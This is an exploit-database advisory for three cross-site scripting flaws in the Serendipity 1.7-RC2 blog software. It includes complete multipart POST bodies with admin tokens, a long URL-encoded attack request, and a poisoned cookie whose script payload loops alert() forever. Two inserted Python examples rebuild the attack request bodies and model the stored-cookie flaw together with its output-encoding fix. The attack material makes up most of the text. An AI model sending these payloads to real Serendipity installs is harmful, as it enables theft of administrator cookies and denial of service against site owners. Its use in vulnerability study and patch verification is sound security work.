SERENDIPITY-1.7-RC2 Multiple Xss Vulnerability

05 Feb 2013 | Reported by Dshellnoi_Unix | Source: 0day.today

# Exploit Title: SERENDIPITY-1.7-RC2 MULTIPLE XSS (REFLECTED, PERSISTENT) AND DOS
# Category: webapps
# Date: 05-02-2013
# Exploit Author: Dshellnoi Unix
# Vendor Homepage: http://www.s9y.org/
# Software Link: http://www.s9y.org/12.html
# Version: 1.7-RC2
# Tested on: Linux ubuntu bt3 r3
# Risk: Medium
@DESCRIPTION
Serendipity is a PHP-powered weblog application which gives the user an easy way
to maintain an online diary, weblog or even a complete homepage. While the default
package is designed for the casual blogger, Serendipity offers a flexible,
expandable and easy-to-use framework with the power for professional applications.

#-------------SUMMARY-----------------------#
#1#-----XSS REFLECTED (add media: serendipity[imageurl])
#2#-----XSS REFLECTED (import: serendipity[import][host])
#3#-----XSS PERSISTENT AND DOS (media library filter serendipity[only_filename], kept in a cookie)


#-----------------------------VULNERABILITY DESCRIPTION 1------------------------------------#
The "Add media" form (serendipity_admin.php, adminModule=images, adminAction=add) does not
validate the serendipity[imageurl] parameter when it tries to fetch an external image: the
submitted value is written back into the response without HTML encoding, so a <script>
payload runs in the administrator's browser (reflected XSS). The request carries
serendipity[token], the per-session form token, so it has to be submitted from an
authenticated admin session.

#---------------------------------- VULN CODE 1----------------------------------------------#
Content-Disposition: form-data; name="serendipity[imageurl]"\r\n
\r\n
<script>alert('XSS BY: Dshellnoi_Unix\\t JORGITO PONTE BIEN HERMANO!!!');</script>\r\n
#-------------------------XSS 1 POC-EXPLOIT-------------------------------------------------#

[PATH]/serendipity/serendipity_admin.php?

SEND POST:

-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[token]"\r\n
\r\n
f15b1dac25ff60dc3de4e0e740ad9cf5\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[action]"\r\n
\r\n
admin\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[adminModule]"\r\n
\r\n
images\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[adminAction]"\r\n
\r\n
add\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[imageurl]"\r\n
\r\n
<script>alert('XSS BY: Dshellnoi_Unix\\t JORGITO PONTE BIEN HERMANO!!!');</script>\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[imageimporttype]"\r\n
\r\n
image\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_filename][1]"\r\n
\r\n
script>\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_directory][1]"\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[column_count][1]"\r\n
\r\n
true\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[userfile][2]"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_filename][2]"\r\n
\r\n
script>\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_directory][2]"\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[column_count][2]"\r\n
\r\n
true\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[all_authors]"\r\n
\r\n
true\r\n
-----------------------------14611403541846138881007847563--\r\n

#---------------------------OUTPUT---------------------------------------#
OUTPUT:  http://www.freeimagehosting.net/ohqqe
#------------------------------------------------------------------------#


#-----------------------------VULNERABILITY DESCRIPTION 2------------------------------------#
The import module (adminModule=import, importFrom=b2evolution), used to restore a backup from
another blog engine, does not properly validate the submitted connection data: the
serendipity[import][host] value is echoed back into the page without HTML encoding, giving a
second reflected XSS. As with #1, the form needs the admin session's serendipity[token].

#---------------------------------- VULN CODE 2----------------------------------------------#
Content-Disposition: form-data; name="serendipity[import][host]"\r\n
\r\n
<script>alert(document.cookie);</script>\r\n

#-------------------------XSS 2 POC-EXPLOIT-------------------------------------------------#

[PATH]/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=import&serendipity%5Btoken%5D=VALID-TOKEN&serendipity%5BimportFrom%5D=b2evolution


SEND POST:

-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[token]"\r\n
\r\n
f15b1dac25ff60dc3de4e0e740ad9cf5\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][host]"\r\n
\r\n
<script>alert(document.cookie);</script>\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][user]"\r\n
\r\n
[email protected]\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][pass]"\r\n
\r\n
12345678\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][name]"\r\n
\r\n
\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][charset]"\r\n
\r\n
ISO-8859-1\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][use_strtr]"\r\n
\r\n
true\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][autodiscovery]"\r\n
\r\n
false\r\n
-----------------------------50697544417510564181894716359--\r\n

#---------------------------OUTPUT 2---------------------------------------#
OUTPUT:  http://www.freeimagehosting.net/2obc8
#--------------------------------------------------------------------------#
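The following is an added example, not part of the advisory and not Serendipity code. It rebuilds the two multipart/form-data bodies shown for #1 and #2 from the field lists above (same field names, same payloads, same boundary) and classifies how a response reflects the injected value, which is the check you want when confirming the bug or verifying a fix. Nothing is sent over the network; the two sample responses are constructed here, and the `user`/`pass` import credentials and all function names are assumptions.

```python
"""Build the advisory's multipart bodies and classify payload reflection.

Added example (not from the advisory, not Serendipity code). No request is
sent; the sample responses below are constructed, not captured.
"""
import html
import re

# Payloads and boundary exactly as they appear in the advisory.
PAYLOAD_IMAGEURL = r"<script>alert('XSS BY: Dshellnoi_Unix\\t JORGITO PONTE BIEN HERMANO!!!');</script>"
PAYLOAD_IMPORT_HOST = "<script>alert(document.cookie);</script>"
BOUNDARY = "---------------------------14611403541846138881007847563"


def build_multipart(fields, boundary=BOUNDARY):
    """Serialise (name, value) pairs the way a browser does, CRLF-terminated.
    A value given as a (filename, content_type, data) tuple becomes a file part."""
    out = []
    for name, value in fields:
        out.append(f"--{boundary}\r\n")
        if isinstance(value, tuple):
            filename, ctype, data = value
            out.append(
                f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
                f"Content-Type: {ctype}\r\n\r\n{data}\r\n"
            )
        else:
            out.append(f'Content-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    out.append(f"--{boundary}--\r\n")
    return "".join(out)


def content_type(boundary=BOUNDARY):
    """Content-Type header to send with a body from build_multipart()."""
    return f"multipart/form-data; boundary={boundary}"


def add_media_body(token, payload=PAYLOAD_IMAGEURL):
    """Vuln 1: the 'add media' form. token must be the logged-in admin's serendipity[token]."""
    return build_multipart([
        ("serendipity[token]", token),
        ("serendipity[action]", "admin"),
        ("serendipity[adminModule]", "images"),
        ("serendipity[adminAction]", "add"),
        ("serendipity[imageurl]", payload),
        ("serendipity[imageimporttype]", "image"),
        ("serendipity[userfile][1]", ("", "application/octet-stream", "")),
        ("serendipity[target_filename][1]", ""),
        ("serendipity[target_directory][1]", ""),
        ("serendipity[all_authors]", "true"),
    ])


def import_body(token, payload=PAYLOAD_IMPORT_HOST):
    """Vuln 2: the b2evolution import form (adminModule=import travels in the query string)."""
    return build_multipart([
        ("serendipity[token]", token),
        ("serendipity[import][host]", payload),
        ("serendipity[import][user]", "user"),   # placeholder credential (assumed)
        ("serendipity[import][pass]", "pass"),   # placeholder credential (assumed)
        ("serendipity[import][name]", ""),
        ("serendipity[import][charset]", "ISO-8859-1"),
        ("serendipity[import][use_strtr]", "true"),
        ("serendipity[import][autodiscovery]", "false"),
    ])


def _encoded_forms(payload):
    """The HTML-encoded spellings a fixed page could use (PHP htmlspecialchars variants)."""
    plain = html.escape(payload, quote=False)          # '<' '>' '&' only
    return {
        plain,
        html.escape(payload, quote=True),              # Python: ' -> &#x27;
        plain.replace('"', "&quot;"),                  # PHP default (ENT_COMPAT)
        plain.replace('"', "&quot;").replace("'", "&#039;"),   # PHP ENT_QUOTES
    }


def reflection(response_html, payload):
    """'unescaped' if the payload comes back verbatim (exploitable),
    'escaped' if only an HTML-encoded copy comes back (fixed),
    'absent' if it is not echoed at all."""
    if payload in response_html:
        return "unescaped"
    if any(form in response_html for form in _encoded_forms(payload)):
        return "escaped"
    return "absent"


# Constructed sample responses (not captured from a real install).
VULNERABLE_RESPONSE = "<html><body><p>Error fetching " + PAYLOAD_IMAGEURL + "</p></body></html>"
FIXED_RESPONSE = "<html><body><p>Error fetching " + html.escape(PAYLOAD_IMAGEURL) + "</p></body></html>"

if __name__ == "__main__":
    print(content_type())
    print(add_media_body("f15b1dac25ff60dc3de4e0e740ad9cf5"))
    print(reflection(VULNERABLE_RESPONSE, PAYLOAD_IMAGEURL))  # unescaped
    print(reflection(FIXED_RESPONSE, PAYLOAD_IMAGEURL))       # escaped
```

To use it against a test install, send the body with the admin session's Cookie header and the Content-Type from `content_type()`; the token has to be the one that session's own forms carry, which is why these bugs need an authenticated administrator rather than an anonymous visitor.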

#-------------VULNERABILITY DESCRIPTION 3 PERSISTENT AND DOS------#
The media library's filename filter (serendipity[only_filename]) is not properly validated.
Serendipity keeps the filter value in a long-lived cookie, so a payload submitted once is
written back into the admin pages on later requests: a persistent XSS. Because the payload is
an endless alert() loop, it also locks up the administrator's browser ("DOS").
To trigger the stored payload, go to Appearance, then Manage Styles, and press the Save button.

#---------------------- VULN CODE 3-------------------#
COOKIE NAME: serendipity[only_filename]
COOKIE VALUE: %3Cscript%3Efor%28%3B%3B%29%7Balert%28%22BOOM+%3D%5E.%5E%3D%22%29%3B%7D%3C/script%3E

#------------------------- XSS 3 (DOS) POC-EXPLOIT-------------------------------------------------#

[PATH]/serendipity/serendipity_admin.php?serendipity%5Btoken%5D=a0a457d81a4b6e641bddbb802b0e0ca1&serendipity%5BadminModule%5D=media&serendipity%5Baction%5D=&serendipity%5BadminAction%5D=&serendipity%5Bonly_path%5D=&serendipity%5Bonly_filename%5D=&serendipity%5Bonly_path%5D=&serendipity%5Bonly_filename%5D=%3Cscript%3Efor%28%3B%3B%29%7Balert%28%22BOOM+%3D%5E.%5E%3D%22%29%3B%7D%3C%2Fscript%3E&serendipity%5Bkeywords%5D=&serendipity%5Bfilter%5D%5Bi.date%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.date%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bi.name%5D=&serendipity%5Bfilter%5D%5Bi.authorid%5D=&serendipity%5Bfilter%5D%5Bi.extension%5D=&serendipity%5Bfilter%5D%5Bi.size%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.size%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_width%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_width%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_height%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_height%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bbp.DPI%5D=&serendipity%5Bfilter%5D%5Bbp.RUN_LENGTH%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bbp.RUN_LENGTH%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bbp.DATE%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bbp.DATE%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bbp.COPYRIGHT%5D=&serendipity%5Bfilter%5D%5Bbp.TITLE%5D=&serendipity%5Bfilter%5D%5Bbp.COMMENT1%5D=&serendipity%5Bfilter%5D%5Bbp.COMMENT2%5D=&serendipity%5Bfilter%5D%5Bbp.ALT%5D=&serendipity%5Bsortorder%5D%5Border%5D=i.date&serendipity%5Bsortorder%5D%5Bordermode%5D=DESC&serendipity%5Bsortorder%5D%5Bperpage%5D=8&go=+-+Go%21+-+

#---------------------------OUTPUT 3 VIDEO DEMO------------------------#
http://www.youtube.com/watch?v=qB0MxnATVvg
#--------------------------------------------------------------------------#
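An added example, not from the advisory and not Serendipity code, modelling #3 in miniature: the cookie name and value are the advisory's own, but the parser, the one-year cookie lifetime, the `render_filter` echo and the session cookie in the demo are hypothetical stand-ins for the behaviour the advisory describes. It shows what the server reads back from the cookie on every later request, why that makes the XSS persistent, and the output-encoding fix beside the vulnerable echo.

```python
"""Vuln 3 in miniature: a filter value persisted in a long-lived cookie and
echoed unescaped is a persistent XSS; the for(;;) alert loop makes it a DoS.

Added example (not Serendipity code). render_filter() and the cookie
lifetime are a hypothetical model of the behaviour described above.
"""
import html
import re
from urllib.parse import quote, unquote_plus

# Cookie name and value exactly as given in the advisory.
COOKIE_NAME = "serendipity[only_filename]"
COOKIE_VALUE = "%3Cscript%3Efor%28%3B%3B%29%7Balert%28%22BOOM+%3D%5E.%5E%3D%22%29%3B%7D%3C/script%3E"


def parse_cookie_header(header):
    """Minimal Cookie: header parser. http.cookies.SimpleCookie silently drops
    names containing '[', which is exactly the name used here, so split by hand.
    Values are URL-decoded ('+' -> space) as PHP does when filling $_COOKIE;
    PHP also maps the bracketed name to $_COOKIE['serendipity']['only_filename']."""
    jar = {}
    for pair in header.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:
            jar[name.strip()] = unquote_plus(value)
    return jar


def persisted_filter(cookie_header):
    """The filter value the server reads back on every later admin request."""
    return parse_cookie_header(cookie_header).get(COOKIE_NAME, "")


def set_cookie_header(value, max_age=60 * 60 * 24 * 365):
    """How the value gets persisted: a Set-Cookie with a long lifetime
    (one year is an assumption; the advisory only says 'long life')."""
    return f"Set-Cookie: {COOKIE_NAME}={quote(value, safe='')}; Max-Age={max_age}; Path=/"


def render_filter(value, escape=False):
    """The media-library page echoing the current filter.
    escape=False is the vulnerable behaviour; escape=True is the fix
    (htmlspecialchars($value, ENT_QUOTES) in PHP terms)."""
    shown = html.escape(value, quote=True) if escape else value
    return f"<p>Filter: {shown}</p>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
_INFINITE_LOOP = re.compile(r"for\s*\(\s*;\s*;\s*\)", re.IGNORECASE)


def would_execute(page):
    """True if the page contains a live <script> element the browser would run."""
    return bool(_SCRIPT_TAG.search(page))


def is_loop_dos(value):
    """True if the stored payload is the never-ending loop from the advisory:
    every admin page that renders it then hangs on alert() until the tab is killed."""
    return bool(_INFINITE_LOOP.search(value))


if __name__ == "__main__":
    # Constructed request cookies: a session cookie plus the poisoned filter.
    stored = persisted_filter(f"PHPSESSID=abc123; {COOKIE_NAME}={COOKIE_VALUE}")
    print(stored)                                              # <script>for(;;){alert("BOOM =^.^=");}</script>
    print(would_execute(render_filter(stored)))                # True  (vulnerable echo)
    print(would_execute(render_filter(stored, escape=True)))   # False (encoded on output)
    print(is_loop_dos(stored))                                 # True
    print(set_cookie_header(stored))
```

The point the model makes is that input "validation" on the filter is not where the fix lives: the value must be HTML-encoded where it is written into the page, and a value read back from a cookie is attacker-controlled input just as a query parameter is.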

#  0day.today [2018-02-15]  #
